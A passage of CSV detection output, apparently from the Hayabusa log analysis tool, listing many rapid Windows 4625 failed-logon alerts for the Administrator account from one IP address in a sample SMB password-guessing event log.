+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ssZya6gArnuepKyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rsDEj6o0NaKUYPZL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pELSIsupIYAxPCtv | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urHCDmdCfNexxUHf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czGXZFukLquA9Mce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: icWMY9pKCQMyTxJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v28FLC2WXEXSUiI5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FwhjHww5iA51SFjp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.552 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 96BwmhKqDIojhdRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DiRvofjwoeAdHYrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNLdOrPwbvYELiCc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x15WKTspmg2ALHaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QMoQWddkcYtCmoKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jhTbfX42Pwn7OA2k | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXcbUCgAhVFfqLc3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GHyXVM0jpaKBiY9N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TZoWEcU6VbEnrLpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LIfEzNQWwvrai4ga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DhImfqWz7SHId9hE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.014 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6sekQfneNE5uFtx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iEQ6KkZEHGcSgdA8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qzxJYBbM7ZMaaGOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wO5GFBqSltNfjtQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PdsMzjfP1ZcPju2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LqpKmoCX9slPXie | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ouHvw1LXTN3OSFYb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tZIB1QO7hfugceJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4QU2BQ0u5tJsdjG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0P7NKiKCmLvu6L1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4obkK4RfsLZe5gdi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.482 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRUDpDLhgop8d1el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LvdsNkFqfFWRePXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wvd8c1jYrEZMcKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AWvECxgkvWdg9Zdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHHPOAYSMSp3BhX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rJicXUMfrx9BOzHI | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eybrQWvrvwSkNADJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VVMPCaQB0XteDSwC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lbjjLoATZE6KPIQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tips954DRcYeIB2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nLe9aMiMz0akxfWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:56.976 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: csroGB9KZOZkb5sY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Zl4Rc25RsvJ7Y9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5CxqCFOIJBMZCD6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gVPwxpR05F3B5aXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nP317UkK2DhTD5Rd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ir3c7dqXm1LhbfqU | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1U1QZiJSrEufxF3b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HZnDnDhTPuC9n5A1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72gY1ClzwuisAhKW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nrneLGOZCwPIeQgT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm3gGV2yR4B3yrJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.419 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fzeklLG1KCTE5FpP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZPwxCw3EWy9NShk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MalB3OcsOsRaMtS3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XMZMqCYPHO3n4RIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1VUeIuU1rQPISNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: md4ioB8wNiaz2EKB | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nM8QaFeqwDfJZ1gc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlR75rMhpLnfQZbC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8BcOe4YUDYTXkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FK0Iiao20PyPmtTk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kQbCbAHrQilFmMZP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.866 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VUdXQOw98VVoksDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fISqpC8eKlaQGabv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s5Y0VryMAHjtB3n2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsjAHlztFIC8tBt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiEQlAlTOhqOKpmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i7lUqZMROQXNUtQm | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0eFCGEtOLzjUxI5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CqfOAGcVcwSgaeo3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hcqVJzkVgvUnebk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9ZpqiTGXqJlAQTZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qCzXKlJ2vPeqqdfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:58.288 
